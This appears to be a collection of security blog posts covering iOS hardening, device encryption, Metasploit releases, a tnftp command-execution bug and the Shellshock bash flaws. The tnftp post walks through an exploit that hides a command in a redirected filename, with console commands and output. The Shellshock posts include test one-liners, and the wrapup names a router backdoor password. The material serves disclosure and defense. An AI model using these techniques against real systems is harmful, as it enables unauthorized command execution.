Allow users to accept untrusted TLS certificates is unchecked. For Problem 3, in Functionality, ensure that Allow iCloud Keychain is unchecked, and that under the Apps tab, Enable Autofill is unchecked. 
For Problem 4, in Functionality, if you use iTunes backups, ensure that Force Encrypted Backups is checked and that Allow iCloud Backup is unchecked. If you want to use iCloud backup, ensure Allow iCloud Backup is checked; the encryption setting will have no impact. If you want to use Apple Configurator backups, I recommend forcing encrypted backups and disallowing iCloud backup; though the forced encryption setting does not appear to apply to Configurator backups, disabling iCloud Backup will still prevent accidental online backups. For Problem 5, in Functionality, make sure Allow Trusting new enterprise app profile (supervised only) is unchecked. For Problem 6, under the Apps tab, ensure that Block pop-ups is checked and that Accept Cookies is set to From Current Website Only (most secure) or at least From Websites I Visit (more compatible, and still more secure than the default value). Under the Functionality tab, ensure that Force Limited Ad Tracking is checked. While you are creating the profile, feel free to configure additional security settings, such as enforcing better passcodes, or pre-configuring your Wi-Fi network name and password so you don't have to type those 127 random characters on a small device screen. Save the profile, then close the profile window. Apply the Profile Back on the main Configurator screen, select the device, then click Add, select Profiles, and browse to your recently saved profile. Add it. The device will be reconfigured automatically, which should take a few seconds. Browse to Settings on your phone, go to General and select Profile. You should now see your profile, and if you drill down, get to a screen describing the configuration changes that apply. Backing up your device, if you now prevent pairing and do not use iCloud Backup If you've decided to supervise your device and prevent iCloud Backup as well as pairing to iTunes, use the Configurator to back your device up. 
If you select your device, you should now see all the information about it, such as serial numbers, IMEI, and the fact that pairing is not allowed. Click "Encrypt Local Backup", and configure a good password. The backup password will be pushed to the phone, and a backup will be performed. Be sure to perform future backups frequently and to store your password safely. Testing To see how the changes we performed impact the behavior of the device, here are some examples. Browsing to an HTTPS site with a self-signed certificate As you can see, it fails, and does not allow you to make a dangerous decision, consciously or by mistake. Trying to enable iCloud Backup Weirdly, there seems to be a bug in iOS 9.1 that will show iCloud Backup as active on the iCloud pane, but when you drill down, you see it is disabled and greyed out. Pairing If you've prevented pairing, simply try to connect your device via USB to another computer you own, start iTunes or Photos, and try to interact with it. The Trust modal dialog should not appear, and data will not be importable. Final Words In a world where most people use cloud services for things such as music streaming and photo storage, USB connectivity is less important than ever before for phones and tablets. As people travel with these devices more and more, attacks on the networks they connect to, or on the physical devices themselves, are more and more probable. If you enable all of these features, you now have an iOS device that is less susceptible to man-in-the-middle attacks meant to steal data or credentials, more resistant to adversaries who might want to back it up to a computer to dig into the backed-up data, slightly better at handling websites securely, and that will enforce your backup strategy and be protected against malicious enterprise applications. 
If you've only opted for the settings that did not require supervision, you still have an improved posture, and I hope you will decide to supervise your next iOS device as soon as you open the box! Special thanks to Jimmy Vo for reviewing, and to Brendan O'Connor for commenting and making me realize that this article should be written.
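If you'd rather script the profile than click through the Configurator GUI, the restrictions above map to keys in a `com.apple.applicationaccess` restrictions payload inside a `.mobileconfig` plist. Below is a minimal sketch in Python using the standard `plistlib` module; the key names are drawn from Apple's Configuration Profile Reference, but treat the exact key set as an assumption and verify against current Apple documentation (and sign the profile appropriately) before deploying. The `com.example.hardening` identifier is a placeholder.

```python
import plistlib
import uuid

# Hypothetical organization identifier -- substitute your own.
ORG = "com.example.hardening"

restrictions = {
    "PayloadType": "com.apple.applicationaccess",
    "PayloadVersion": 1,
    "PayloadIdentifier": f"{ORG}.restrictions",
    "PayloadUUID": str(uuid.uuid4()),
    "PayloadDisplayName": "iOS Hardening Restrictions",

    # Problem 1: no pairing with non-Configurator hosts (supervised only)
    "allowPairing": False,
    # Problem 2: refuse untrusted TLS certificates outright
    "allowUntrustedTLSPrompt": False,
    # Problem 3: no iCloud Keychain prompts
    "allowCloudKeychainSync": False,
    # Problem 4: local, encrypted backups only
    "allowCloudBackup": False,
    "forceEncryptedBackup": True,
    # Problem 5: no trusting new enterprise app certs (supervised only)
    "allowEnterpriseAppTrust": False,
    # Problem 6: saner Safari defaults
    "safariAllowPopups": False,
    "forceLimitAdTracking": True,
}

profile = {
    "PayloadType": "Configuration",
    "PayloadVersion": 1,
    "PayloadIdentifier": ORG,
    "PayloadUUID": str(uuid.uuid4()),
    "PayloadDisplayName": "iOS Hardening",
    "PayloadRemovalDisallowed": True,  # the "Never" removable option
    "PayloadContent": [restrictions],
}

with open("hardening.mobileconfig", "wb") as f:
    plistlib.dump(profile, f)
```

The resulting file can be opened in the Apple Configurator to inspect it against what the GUI would have produced, then pushed to the device the same way as a GUI-built profile.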

The Haves And Have-Nots in Device Security


Today's story about the ongoing issues law enforcement is running into with Apple's encrypted-by-default design illustrates a major difference between the iPhone and Android security models. Encryption by default on older Apple devices makes it impossible for anyone without the password to decrypt the phone. This, in turn, becomes a problem for law enforcement, since it means that, barring an exploitable boot-time vulnerability, no one can peek in on personal data stored on an iPhone. This leaves out in the cold not only law enforcement with a compelling reason and a court order, but also criminal and espionage organizations. Of course, an individual or rogue element in a law enforcement organization also cannot spy on most iPhone users' stored data, with or without judicial oversight. This is itself a pretty strong guarantee of civil liberties, and helps protect Fourth Amendment guarantees in the U.S. The fact that the U.S. Department of Justice is still asking for Apple's help, and Apple's statements that it's technically unfeasible to help the DoJ, are good news for end users who are concerned with personal privacy. I can appreciate the government's frustration with device encryption in cases where they suspect the evidence is there and the device's owner is being uncooperative. But the fact is that if there were a backdoor to device encryption, or other means for law enforcement to subvert encryption with a court order, it would mean there is a technical capability for anyone to do the same as soon as the mechanism became known, and judicial oversight and good intentions would become optional. Unfortunately, Android phones do not enjoy this level of across-the-board privacy protection. According to the Android Compatibility Definition, there are many, many mid-range and lower-end devices that are exempt from encryption by default, even in Marshmallow, the latest named release. 
Section 9.9 exempts devices that don't meet a minimum performance threshold, and other devices may define a default (and therefore discoverable) password for the encryption key in certain implementation circumstances. The lack of encryption by default on Android is problematic from a civil liberties perspective. Android devices are less expensive than iPhones, and account for over 80% of all smartphones. So, while the iPhone continues to provide the safer default configuration, the vast majority of people who use smartphones as their primary Internet device will not enjoy the privacy-enhancing benefits of on-board encryption. It's a shame that this haves-and-have-nots dichotomy exists when it comes to default privacy guarantees. I'm hopeful that people who value the security of their privacy are aware of the differences between Android devices, and how they compare to their Apple counterparts. While it's possible to enable local disk encryption on many Android devices, end users rarely poke into settings beyond the defaults. Put simply, people shouldn't have to be rich enough to afford, or expert enough to configure, a device for basic privacy and security in order to enjoy those benefits.

Metasploit Framework Open Source Installers


Rapid7 has long supplied universal Metasploit installers for Linux and Windows. These installers contain both the open source Metasploit Framework as well as commercial extensions, which include a graphical user interface, metamodules, wizards, social engineering tools, and integration with other Rapid7 tools. While these features are very useful, we recognized that they are not for everyone. According to our recent survey of Metasploit Community users, most only used it for the open source components, preferring the command-line tools over the graphical ones. Also, while we do our best to ensure that Metasploit Community and Pro releases are of high quality, they are not always supplied with the latest hot new exploits and payloads available in Metasploit Framework. While it has always been possible to simply set up a development environment and run the latest metasploit-framework code from GitHub directly, that can still be tricky to set up and keep up to date. Kali Linux 2.0 now publishes the open source pieces of Metasploit Framework with its distribution, but its release schedule still follows that of the Metasploit Community / Pro editions, and it of course does not necessarily help those who prefer other operating systems. To address the needs of open source enthusiasts, those needing more frequent updates, or those simply looking for an easy way to set up a database for Metasploit Framework development use, we have created open source installers for Metasploit Framework for Windows, OS X, and Linux x86 and x86-64 platforms. These installers utilize the Omnibus tool from Chef to package everything needed to run Metasploit Framework, from dependent libraries and a specific Ruby version to a built-in PostgreSQL database. The installers are easy to install and get you up and running in seconds. 
They are also built and tested automatically each night, so you can always run 'msfupdate' and get the latest exploits and payloads without having to set up a development environment. The installers also integrate with your OS's native package manager, be it RPM or DEB-based on Linux, MSI for Windows, or PKG for OS X. That makes them easy to uninstall as well. For information about how to install and use these new packages, see the wiki page on the Metasploit Framework GitHub project. The installers themselves are also open source, so if you see a problem, pull requests or issue reports are very welcome! Note that in addition to these Metasploit-specific installers, there are other ways to get Metasploit Framework, such as through Dave Kennedy's PenTester Framework or even pre-installed in Kali Linux. The Metasploit Framework omnibus installers provide another way to get the open source Metasploit Framework running on a variety of platforms quickly and easily.

Weekly Metasploit Wrapup


Time for another weekly wrapup for Metasploit! Since it's been getting some play in the news, I wanted to use this space to talk a little bit more about CERT's recent advisory regarding hardcoded credentials on small office / home office (SOHO) routers. You probably know it by its decidedly non-poetic identifier, VU#950576. Hardcoded credentials are one of the most well-known common vulnerabilities in SOHO routers from nearly every vendor. These are not software bugs in the traditional sense, but specific usernames and passwords that are trivial to exploit, very rapidly, across thousands to millions of these devices. These backdoors are usually not reachable directly from the Internet; the attacker must be on the local network in order to use them to reconfigure devices. However, this shouldn't necessarily be comforting. While attackers must be "local," most of these credentials are usable on the configuration web interface, and a common technique is to use a cross-site scripting (XSS) attack on a given website to silently force the user (on the inside network) to log in to the device and commit changes on the attacker's behalf. Attackers on free, public WiFi are also on the local network, and can make configuration changes to a router that affect anyone else connected to that access point. Once an attacker has administrative control over the router, the opportunities for mischief and fraud are nearly limitless. He can do anything from setting up custom DNS configurations, which will poison the local network's name resolution, to completely replacing the firmware with his own, enabling him to snoop on and redirect any and all traffic at will. Backdoor credentials like these are certainly not new; simply Googling the Observa Telecom hidden administrator account password, 7449airocon, turns up nearly 400 hits on sites ranging from legitimate router security research blogs to sites dedicated to criminal activity. 
I'm glad that CERT/CC is bringing attention to this problem. Manufacturers must make every effort to at least allow end users to change these passwords; ideally, passwords would be generated randomly on first boot or firmware restore. Until manufacturers stop using default passwords on the devices users rely on for Internet connectivity, we will continue to see opportunistic attacks on home and small business routers. So what does this all have to do with Metasploit? Well, we have a few contributors who regularly kick out exploit and auxiliary modules for SOHO land, with Michael m-1-k-3 Messner as the reigning champion for most SOHO router modules authored. That guy is pretty amazing, and thanks to him and all the rest of the SOHO router hacking crowd, we have about fifty or so Metasploit modules specifically for SOHO routers. The bummer, of course, is that SOHO routers are rarely in scope for any normal pentest, unless your engagement is with a retail coffee shop or restaurant or something. We've long known that the "border" between the external network and the internal network is a convenient fiction, and that division is eroding even more today as more and more people opt out of traffic (and pants) by telecommuting to work. Because of this trend, which shows no signs of slowing down, I hope to see pentesting scopes start to include that home network with the backdoored router. If you have decently-sourced stats on organizations who got popped by an attacker pivoting through a home router, or otherwise using SOHO router control to skip into a company's internal network, I'd love to see them. Just comment below. New Modules We have nine new modules this week: four exploits and five auxiliary modules. Pay extra attention to the OS X 'tpwn' bug, which was discussed at length a week or so back. It's a privilege escalation issue, and while it's local only, there are scenarios where I can imagine this thing would be very effective. 
US schools sometimes have shared computer labs, full of Apple desktops, shared several times a day with many people. If one of them happens to have root on OS X, it's not all that difficult to start keystroke logging and picking up everyone's Myspace account credentials. Or whatever other social media service the kids are into these days. For other changes since the last Wrapup, just swing by this compare view, and see who all has been hacking on Metasploit Framework lately.

Exploit modules
- Firefox PDF.js Privileged Javascript Injection by joev, Marius Mlynski, and Unknown exploits CVE-2015-0802
- Mac OS X "tpwn" Privilege Escalation by wvu and qwertyoruiop
- VideoCharge Studio Buffer Overflow (SEH) by Andrew Smith, Christian Mehlmauer, and metacom exploits OSVDB-69616
- Symantec Endpoint Protection Manager Authentication Bypass and Code Execution by Markus Wulftange and bperry exploits CVE-2015-1489

Auxiliary and post modules
- Firefox PDF.js Browser File Theft by Unknown, Unknown, and fukusa exploits CVE-2015-4495
- Android Settings Remove Device Locks by CureSec and timwr exploits CVE-2013-6271
- PuTTY Saved Sessions Enumeration Module by Stuart Morgan
- Windows Powershell Execution Post Module by Nicholas Nam (nick) and RageLtMan
- Load Scripts Into PowerShell Session by Ben Turner (benpturner) and Dave Hardy (davehardy20)
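The "generate passwords randomly on first boot or firmware restore" recommendation above is cheap for manufacturers to implement. A minimal sketch follows; real firmware would do this in its own language, and the character set and length here are my assumptions (chosen so the result is printable on a device label), not anything from the advisory.

```python
import secrets
import string

# Characters safe to print on a router's label (ambiguous glyphs removed).
ALPHABET = "".join(c for c in string.ascii_letters + string.digits
                   if c not in "Il1O0")

def first_boot_password(length: int = 12) -> str:
    """Generate a unique admin password per device at first boot or
    firmware restore, instead of shipping one hardcoded default."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

print(first_boot_password())
```

Twelve characters from a 57-symbol alphabet gives roughly 10^21 possibilities per device, which turns "Google the vendor's default password" from a one-step attack into a non-starter.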

Top 10 list of iOS Security Configuration GIFs you can send your friends and relatives


Easily share these animated iOS Security tips with friends and relatives! While iOS is generally considered to be quite secure, a few configuration items can improve its security. Some changes have very little functionality impact, while others are more visible but probably only needed in specific environments. This guide contains some of the most important, obvious ones, and contains a GIF for each configuration step to be taken. If you already know everything about iOS security, use this as a way to easily explain to friends and relatives how certain configurations are changed. As most of our readers are in the security field, we actually expect this to be more useful as a way for you to help your friends and relatives. Why GIFs? They are awesome. They can lead to entertaining discussions about why it is wrong to pronounce GIF with a soft G. Because while you, awesome reader, may know how to perform these configuration changes, you may not know the steps by heart or want to walk your friends through step-by-step. Just re-gif these! (Pun intended. I am sorry). Steps Do not Jailbreak it This is our first step, and we are already cheating. There is nothing for you to do. While jailbreaking can be very useful for testing the security of iOS applications or iOS itself, jailbreaking a "day to day" phone is dangerous, as it disables many of the protections of iOS. Software Updates iOS iOS will regularly check for new versions, but if this is a new device, or one that hasn't been used in a while, you should check manually. Application Updates Applications need to be updated too. Sometimes for bug fixes, and sometimes for security patches. Fortunately, iOS allows automated patching, making it painless. Give it a good passcode, enable auto-lock and “Erase Data” Note: If your phone is TouchID equipped, using a longer password with different types of characters can add security without being too painful, as you will rarely use the password. 
I personally set auto-lock to lock my devices instantly, because TouchID allows me to unlock them so fast. I know that if I forgot my phone on a table or in a cab, I would feel better knowing there was no time window where someone could snoop through my stuff easily. The "Erase Data" feature ensures that the phone is wiped after too many failed attempts. WiFi WiFi: Ensure WiFi doesn't ask to join potentially insecure networks iOS has an option to prompt you to join networks automatically. Let's make sure it's off. Safari Safari has various options to request that sites do not track you (which sites may or may not honor), to only accept cookies from the site you are visiting, and more. Additional privacy measures can be taken with Safari, such as ensuring search engine suggestions are not used, that the top hit is not preloaded, and more. These have an impact on usability and are more subtle in the protection they provide. While storing passwords in a browser is typically a bad idea, we recommend that you read this article by Rich Mogull before dismissing iCloud Keychain completely. It certainly beats not using a password management tool at all. Find my iPhone A lost phone can mean having to buy a new one, and we know these devices are expensive. It can also mean someone has access to your data, email account, and more. By having a good passcode on your phone, you greatly limit the odds that someone who found your phone could use it. By enabling Find my iPhone, you can make sure that they can't wipe it and enable it for themselves, and you can display a message on the screen asking the person who found it to contact you. Two settings exist for Find my iPhone. The first one enables it, which is very simple. From that moment, you can log in to iCloud to set your phone as lost, see its location, and send a message to it. Apple receives the device location when that lost mode is enabled. 
The second option allows your phone to send its location just before running out of battery. This can be very useful if you lose your phone in a location where nobody finds it, and it runs out of battery before you notice. Be aware that enabling this second option means Apple will receive the phone's location even when you have not set it as lost.

Edit: As mentioned by reader @ClausHoumann on Twitter, network connectivity is required for Find my iPhone to work. This means that if you are traveling without a data plan or with data roaming disabled (because roaming is expensive in a lot of areas), Find my iPhone will not be able to locate your phone. It will still prevent activation of your phone. Thank you Claus!

Never trust computers or devices you do not own

If you ever connect your phone to a device you do not own and see this screen, never trust it. If you have trusted a device or computer by mistake, follow the steps in this knowledge base article to remove the trusted relationship from your iOS device. Trusted devices can access data on your phone, back it up, and sync data to it. Only your own computer should be trusted by your phone.

Note: Charging your phone on an untrusted computer, or even on a USB charger that is not yours, can carry some risk. If you see this prompt when using what should be a "dumb" USB charger, consider it suspicious. If you are at a security conference, do not trust any USB charger provided by people in black t-shirts.

Avoid receiving images from weird strangers during your commute

AirDrop is very useful, but if left open to everyone, it can lead to [bizarre interactions](http://www.theverge.com/tldr/2014/11/10/7171345/the-best-use-for-apple-airdrop-is-space-sloths).

Enable iCloud "Two-Step Verification"

Last, but not least, ensure you enable this feature on your iCloud account. For this last recommendation, we cheat and do not provide a GIF. Simply go to Apple's Knowledge Base for more information.
Enabling this will require you to link your trusted iOS device(s) and to provide a 4-digit PIN sent to one of them when you log in to iCloud or Apple ID-related services. This will significantly reduce the odds of bad things happening to your iCloud account, data, or devices linked to iCloud if your password is compromised. Save your Recovery Key somewhere safe: if you lose it along with your password or your devices at the same time, you might be in trouble!

12 Days of HaXmas: RCE in Your FTP

This post is the sixth in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements and events in the Metasploit Framework over the course of 2014. It's been quite a year for shell bugs. Of course, we…

This post is the sixth in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements and events in the Metasploit Framework over the course of 2014.

It's been quite a year for shell bugs. Of course, we all know about Shellshock, the tragic bash bug that made the major media news. Most of us heard about the vulnerabilities in the command line tools wget, curl, and git (more on that last one later on during HaXmas). But did you notice the FTP command bug? The one that remains unpatched today on a fairly popular operating system? Read on...

popen()'ing an RCE present

Shortly before Halloween, I was reading the oss-sec mailing list when I stumbled upon a pretty cool (almost tragic) bug in the ftp(1) command on {Free,Net,DragonFly}BSD and OS X. The bug is rather simple, as explained (somewhat verbosely) by the description in the Metasploit module:

This module exploits an arbitrary command execution vulnerability in tnftp's handling of the resolved output filename - called "savefile" in the source - from a requested resource. If tnftp is executed without the -o command-line option, it will resolve the output filename from the last component of the requested resource. If the output filename begins with a "|" character, tnftp will pass the fetched resource's output to the command directly following the "|" character through the use of the popen() function.

Okay, so how do we use this thing? We can use Metasploit! Using auxiliary/server/tnftp_savefile is pretty easy:

msf > use auxiliary/server/tnftp_savefile
msf auxiliary(tnftp_savefile) > set uripath /
uripath => /
msf auxiliary(tnftp_savefile) > set urihost [redacted]
urihost => [redacted]
msf auxiliary(tnftp_savefile) > set uriport 80
uriport => 80
msf auxiliary(tnftp_savefile) > run
[*] Auxiliary module execution completed
msf auxiliary(tnftp_savefile) >
[*] Using URL:
[*] Local IP:
[*] Server started.

Don't worry about the URIHOST or URIPORT advanced options unless you're working through a tunnel.
Just set URIPATH to / to allow any URL to redirect to the exploit.

Triggering the vulnerability

Here we are triggering the vuln on a fully patched OS X Yosemite system:

wvu@hiigara:~$ ftp http://[redacted]/index.html
Requesting http://[redacted]/index.html
Redirected to http://[redacted]:80/%7c%75%6e%61%6d%65%20%2d%61
Requesting http://[redacted]:80/%7c%75%6e%61%6d%65%20%2d%61
0 0.00 KiB/s
Darwin hiigara 14.0.0 Darwin Kernel Version 14.0.0: Fri Sep 19 00:26:44 PDT 2014; root:xnu-2782.1.97~2/RELEASE_X86_64 x86_64
0 0.00 KiB/s
wvu@hiigara:~$

Thanks to the redirect, we can hide the true purpose of our URL until it's too late. Back in msfconsole, we can see the results of our attack:

[*] tnftp_savefile - tnftp/20070806 connected
[*] tnftp_savefile - Redirecting to exploit...
[+] tnftp_savefile - Executing `uname -a'!

That's really all there is to it! Happy hacking!
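As a footnote, the core of the bug is easy to paraphrase in shell. This is only a sketch of tnftp's savefile check, not its actual source: the output filename is taken from the last component of the requested path, and a leading "|" hands the remainder to popen(). The percent-encoded path in the transcript above is just `|uname -a` in disguise.

```shell
# Paraphrase of tnftp's flawed savefile handling (sketch, not real source):
# a fetched resource whose last path component starts with '|' becomes a
# command line for popen() instead of a filename.
savefile='|uname -a'    # last component of .../%7c%75%6e%61%6d%65%20%2d%61
case "$savefile" in
  '|'*) msg="popen() would run: ${savefile#|}" ;;   # the vulnerable branch
  *)    msg="would save output to: $savefile" ;;    # the intended behavior
esac
echo "$msg"
```

Passing -o on the command line sidesteps the vulnerable path entirely, which is why the module relies on redirecting the victim to a crafted resource name.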

Apple Releases Patch for Shellshock, May Still Be Vulnerable

Yesterday, Apple released security updates that address two of the "Shellshock" bash vulnerabilities: CVE-2014-6271 and CVE-2014-7169. At the time of writing, the updates are not available using Software Update on OS X. Instead, users should download the package directly from Apple's web site to install…

Yesterday, Apple released security updates that address two of the "Shellshock" bash vulnerabilities: CVE-2014-6271 and CVE-2014-7169. At the time of writing, the updates are not available using Software Update on OS X. Instead, users should download the package directly from Apple's web site to install it. Updates are available for 10.7 (Lion), 10.8 (Mountain Lion) and 10.9 (Mavericks).

Amidst the flurry of activity and interest around Shellshock over the last week, several additional bash vulnerabilities have come to light. The initial fix for CVE-2014-6271 was incomplete, leading to CVE-2014-7169 being found. Since then, several more related CVEs have been announced. Hanno Böck has released a simple tool called bashcheck that tests which vulnerabilities an installed version of bash is susceptible to. I ran this on a patched version of 10.8 (Mountain Lion) and verified that the fix addresses the first two vulnerabilities, but it seems that the updated version of bash may still be vulnerable to CVE-2014-7186.

All OS X users are advised to apply this update immediately. Metasploit already has a local root exploit for OS X via VMware Fusion due to CVE-2014-6271.

Additional information about this update from Apple is available in this post to their security-announce mailing list.

Update (October 2nd): OS X users can breathe a little easier. The bashcheck script has been updated with some refined tests, which now indicate that although Apple's updated version of bash does still contain two Shellshock-related bugs, they are not actually exploitable. Output from a patched Mavericks system:

Just to drive home the importance of applying this update, here is the result from an unpatched Mavericks system:
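If you'd rather not fetch bashcheck, the CVE-2014-7186 condition can be probed by hand with a one-liner equivalent to one of bashcheck's tests: feeding bash more stacked here-documents than its redirection stack holds crashes a vulnerable build, while a fixed build simply runs the command and exits cleanly (with warnings on stderr).

```shell
# CVE-2014-7186 ("redir_stack") probe: a vulnerable bash segfaults while
# parsing 14 stacked here-documents; a patched bash runs `true` and exits 0.
if bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' 2>/dev/null; then
  result="bash does not appear vulnerable to CVE-2014-7186"
else
  result="bash crashed: likely vulnerable to CVE-2014-7186"
fi
echo "$result"
```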

Bash-ing Into Your Network & Investigating CVE-2014-6271

[UPDATE September 29, 2014: Since our last update on this blog post, four new CVEs that track ShellShock/bash bug-related issues have been announced. A new patch was released on Saturday September 27 that addressed the more critical CVEs (CVE-2014-6277 and CVE-2014-6278).  In sum:…

[UPDATE September 29, 2014: Since our last update on this blog post, four new CVEs that track Shellshock/bash bug-related issues have been announced. A new patch was released on Saturday, September 27 that addresses the more critical CVEs (CVE-2014-6277 and CVE-2014-6278). In sum: if you applied the Shellshock-related patches before Saturday, September 27, you likely need to apply this new patch. We have updated our original blog post below to reflect this new information.]

Original blog post with September 29 updates below:

By now, you may have heard about CVE-2014-6271, also known as the "bash bug" or even "Shellshock", depending on where you get your news. This vulnerability was discovered by Stephane Chazelas of Akamai and is potentially a big deal. It's rated the maximum CVSS score of 10 for impact and ease of exploitability. The affected software, Bash (the Bourne Again SHell), is present on most Linux, BSD, and Unix-like systems, including Mac OS X. New packages were released September 25, but further investigation made it clear that the patched version may still be exploitable, and at the very least can be crashed due to a null pointer exception. The incomplete fixes are being tracked as CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, and CVE-2014-6278.

Should I panic?

The vulnerability looks pretty awful at first glance, but most systems with Bash installed will NOT be remotely exploitable as a result of this issue. In order to exploit this flaw, an attacker would need the ability to send a malicious environment variable to a program interacting with the network, and this program would have to be implemented in Bash or spawn a sub-command using Bash. The Red Hat blog post goes into detail on the conditions required for a remote attack. The most commonly exposed vector is likely going to be legacy web applications that use the standard CGI implementation.
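For a concrete sense of the attack primitive, the widely circulated check for CVE-2014-6271 is a single line: export an environment variable whose value looks like a function definition with a trailing command, then start bash. A vulnerable bash executes the trailing command while merely importing its environment.

```shell
# Classic Shellshock (CVE-2014-6271) check. A patched bash prints only
# "this is a test"; a vulnerable bash prints "vulnerable" first, because the
# trailing command runs while the environment is being parsed.
out=$(env x='() { :;}; echo vulnerable' bash -c 'echo this is a test')
echo "$out"
```

Note that the attacker never needs a shell of their own here; anything that sets an environment variable and then causes bash to start is enough, which is exactly the CGI condition described above.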
On multi-user systems, setuid applications that spawn "safe" commands on behalf of the user may also be subverted using this flaw. Successful exploitation of this vulnerability would allow an attacker to execute arbitrary system commands at a privilege level equivalent to that of the affected process.

What is vulnerable?

This attack revolves around Bash itself, not a particular application, so the paths to exploitation are complex and varied. So far, the Metasploit team has been focusing on the web-based vectors, since those seem to be the most likely avenues of attack. Standard CGI implementations accept a number of parameters from the user, including the browser's user agent string, and store these in the process environment before executing the application. A CGI application that is written in Bash, or that calls system() or popen(), is likely to be vulnerable, assuming that the default shell is Bash.

Secure Shell (SSH) will also happily pass arbitrary environment variables to Bash, but this vector is only relevant when the attacker has valid SSH credentials yet is restricted to a limited environment or a specific command. The SSH vector is likely to affect source code management systems and the administrative command-line consoles of various network appliances (virtual or otherwise).

There are likely many other vectors (DHCP client scripts, etc.), but they will depend on whether the default shell is Bash or an alternative such as Dash, Zsh, Ash, or Busybox, which are not affected by this issue. (There are Metasploit modules available for validating this exploit path.)

Modern web frameworks are generally not going to be affected. Simpler web interfaces, like those you find on routers, switches, industrial control systems, and other network devices, are unlikely to be affected either, as they either run proprietary operating systems or use Busybox or Ash as their default shell in order to conserve memory.
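The reason an environment variable can carry executable content in the first place is bash's function-export feature: a parent shell can serialize a function into the environment, and child bash processes import it on startup. Shellshock was a bug in that import parser. A minimal demonstration of the legitimate feature (assuming bash is installed):

```shell
# A parent bash exports a function; a grandchild bash imports and runs it.
# Shellshock abused this import step: text placed after the function body
# was executed as soon as the variable was parsed.
imported=$(bash -c '
  greet() { echo from-parent; }
  export -f greet
  bash -c greet
')
echo "$imported"
```

Post-patch bash still supports exported functions, but encodes them in specially named variables (e.g. BASH_FUNC_name%%) so that arbitrary attacker-chosen variables are no longer parsed as function definitions.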
A quick review of approximately 50 firmware images from a variety of enterprise, industrial, and consumer devices turned up no instances where Bash was included in the filesystem. By contrast, a cursory review of a handful of virtual appliances had a 100% hit rate, though the web applications were not vulnerable due to how the web server was configured. As a counterpoint, Digital Bond believes that quite a few ICS and SCADA systems include the vulnerable version of Bash, as outlined in their blog post. Robert Graham of Errata Security believes there is potential for a worm after he identified a few thousand vulnerable systems using Masscan. The esteemed Michal Zalewski also weighed in on the potential impact of this issue. In summary, there just isn't enough information available to predict how many systems are potentially exploitable today.

The two most likely situations where this vulnerability will be exploited in the wild:

- Diagnostic CGI scripts that are written in Bash, or that call out to system(), where Bash is the default shell
- PHP applications running in CGI mode that call out to system(), where Bash is the default shell

Bottom line: This bug is going to affect an unknowable number of products and systems, but the conditions required for remote exploitation are fairly uncommon.

Update (September 25): A DDoS bot that exploits this issue has already been found in the wild by @yinettesys.

Update (September 29):

- There have been several reports of CVE-2014-6271 being exploited through worms.
- There is proof-of-concept code to exploit DHCP, found by Geoff Walton.
- Memory corruption flaws in the Bash parser have been found by @taviso and are being tracked as CVE-2014-7186 and CVE-2014-7187. We don't expect to see exploit code immediately, and it wouldn't be applicable without specific targeting.
- A couple of new issues were found by Michal Zalewski (@lcamtuf). The first, CVE-2014-6277, permits remote code execution but requires a high level of expertise.
The second, CVE-2014-6278, is more severe, as it allows remote code execution without requiring a high level of expertise. Both of these vulnerabilities have been resolved in the upstream Ubuntu/RHEL/Debian patches that incorporate Florian Weimer's unofficial patch.

Is it as bad as Heartbleed?

There has been a great deal of debate on this in the community, and we're not keen to jump on the “Heartbleed 2.0” bandwagon. The conclusion we reached is that some factors are worse, but the overall picture is less dire. This vulnerability enables attackers not just to steal confidential information, as with Heartbleed, but also to take over the device or system and execute code remotely. From what we can tell, the vulnerability is likely to affect a lot of systems, but it isn't clear which ones, or how difficult those systems will be to patch. The vulnerability is also incredibly easy to exploit. Put that together and you are looking at a lot of confusion and the potential for large-scale attacks.

BUT - and that's a big but - per the above, a number of factors need to be in play for a target to be susceptible to attack. Every affected application may be exploitable through a slightly different vector, or have different requirements to reach the vulnerable code. This may significantly limit how widespread attacks will be in the wild. Heartbleed was much easier to test for conclusively, and its impact was far more widespread.

What can we do to help?

[Updated October 1] Rapid7 Metasploit has been updated to assist with the detection and verification of these issues. Modules for testing various exploitation paths are available in both Metasploit Community and Pro. We strongly recommend that you test your systems as soon as possible and deploy any necessary mitigations. Rapid7 Nexpose has been updated with authenticated and remote checks for CVE-2014-6271 and CVE-2014-7169.
Nexpose 5.10.12 improves the accuracy of the remote Shellshock (CVE-2014-6271) vulnerability check; customers should update their Nexpose deployments to 5.10.12. Nexpose 5.10.13 adds authenticated coverage for CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, and CVE-2014-6278. If you would like some advice on how to handle this situation, our Services team can help.

Are Rapid7's solutions affected?

[Updated September 29] Nexpose Virtual Appliances are provided with the Ubuntu distribution operating system, which has patches for CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, and CVE-2014-7187. We've just updated the Nexpose Virtual Appliance Deployment Guide with instructions for updating the underlying Ubuntu OS. We recommend that you review the guide and apply the latest system patches, which were released on September 27th.

More information

We've gathered all the information we've published about the bash bug right here: bashbug CVE-2014-6271 (shellshock): What is it? How to Remediate | Rapid7

Weekly Metasploit Update: Apple, GDB, and Dogecoin

Apple TV Tricks This week, we have three new auxiliary modules that facilitate taking over Apple TV devices, all from community contributor 0a2940, with help from Wei sinn3r Chen and Dave TheLightCosine Maloney. Why Apple TV? Well, for starters, we already have modules for Google's…

Apple TV Tricks

This week, we have three new auxiliary modules that facilitate taking over Apple TV devices, all from community contributor 0a2940, with help from Wei sinn3r Chen and Dave TheLightCosine Maloney. Why Apple TV? Well, for starters, we already have modules for Google's Chromecast, a similar chunk of consumer hardware, and we didn't want Google to think we were picking on them. Secondly, these aren't just devices that live in people's living rooms. Apple TV has some level of marketing and presence in conference rooms -- in fact, there's literally a "Conference Room" display mode. This means that these devices, which are cheap (typically under $100) and ubiquitous (at least, Apple hopes so), have a presence on many companies' networks, almost certainly without any kind of formal IT control or asset management. Finally, the access security is basically non-existent. By default, Apple TV devices have no password. If you want some security, you're likely to pick the "OnScreen" mode, where the TV screen displays a four-digit PIN which you are supposed to key into your streaming device (or Metasploit module). Of course, that's trivially bruteforced. Only rarely will you find an Apple TV device set up with a proper password.

